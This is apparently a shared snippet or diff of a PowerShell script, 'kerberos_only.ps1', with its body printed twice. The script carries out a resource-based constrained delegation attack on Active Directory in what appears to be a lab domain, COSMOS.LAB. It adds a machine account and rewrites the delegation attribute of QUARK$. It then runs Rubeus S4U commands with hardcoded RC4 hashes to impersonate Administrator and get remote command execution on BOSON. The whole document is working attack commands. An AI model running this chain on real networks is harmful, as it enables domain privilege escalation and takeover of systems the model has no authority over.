analyticsearch · October 11, 2022 15:29
diff --git a/kerberos_only.ps1 b/kerberos_only.ps1
 # Add Machine account
 New-MachineAccount -MachineAccount STRANGE -Password $(ConvertTo-SecureString 'Strange@123' -AsPlainText -Force)


 # Add STRANGE$ in msDS-AllowedToActOnBehalfOfOtherIdentity attribute of QUARK$
 $S4UIdentity = "COSMOS\STRANGE$"
 $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value
 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
 $SDBytes = New-Object byte[] ($SD.BinaryLength)
 $SD.GetBinaryForm($SDBytes, 0)
 Get-DomainComputer "QUARK.COSMOS.LAB" | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose


 # Verify if RBCD is set correctly
 $RawBytes = Get-DomainComputer "QUARK.COSMOS.LAB" -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
 $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
 $Descriptor.DiscretionaryAcl
 ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier


 # RBCD to get forwardable TGS from S4U2Proxy
 .\Rubeus.exe s4u /impersonateuser:Administrator /user:STRANGE$ /rc4:0ED0E7DA0EFAD91BE14AB2D1404A8226 /msdsspn:http/QUARK.COSMOS.LAB /nowrap
 .\Rubeus.exe describe /ticket:[ticket]


 # Use the TGS as 'S4U2Self' for BOSON$
 Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
 .\Rubeus.exe s4u /tgs:[ticket] /user:QUARK$ /rc4:39788bc50412dfad55fbaa1b24af57b7 /msdsspn:cifs/BOSON.COSMOS.LAB /altservice:http /ptt
 Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
	# Add Machine account
	New-MachineAccount -MachineAccount STRANGE -Password $(ConvertTo-SecureString 'Strange@123' -AsPlainText -Force)


	# Add STRANGE$ in msDS-AllowedToActOnBehalfOfOtherIdentity attribute of QUARK$
	$S4UIdentity = "COSMOS\STRANGE$"
	$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value
	$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
	$SDBytes = New-Object byte[] ($SD.BinaryLength)
	$SD.GetBinaryForm($SDBytes, 0)
	Get-DomainComputer "QUARK.COSMOS.LAB" \| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose


	# Verify if RBCD is set correctly
	$RawBytes = Get-DomainComputer "QUARK.COSMOS.LAB" -Properties 'msds-allowedtoactonbehalfofotheridentity' \| select -expand msds-allowedtoactonbehalfofotheridentity
	$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
	$Descriptor.DiscretionaryAcl
	ConvertFrom-SID $Descriptor.DiscretionaryAcl.SecurityIdentifier


	# RBCD to get forwardable TGS from S4U2Proxy
	.\Rubeus.exe s4u /impersonateuser:Administrator /user:STRANGE$ /rc4:0ED0E7DA0EFAD91BE14AB2D1404A8226 /msdsspn:http/QUARK.COSMOS.LAB /nowrap
	.\Rubeus.exe describe /ticket:[ticket]


	# Use the TGS as 'S4U2Self' for BOSON$
	Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
	.\Rubeus.exe s4u /tgs:[ticket] /user:QUARK$ /rc4:39788bc50412dfad55fbaa1b24af57b7 /msdsspn:cifs/BOSON.COSMOS.LAB /altservice:http /ptt
	Invoke-Command -ComputerName BOSON.COSMOS.LAB -ScriptBlock { whoami }
No results found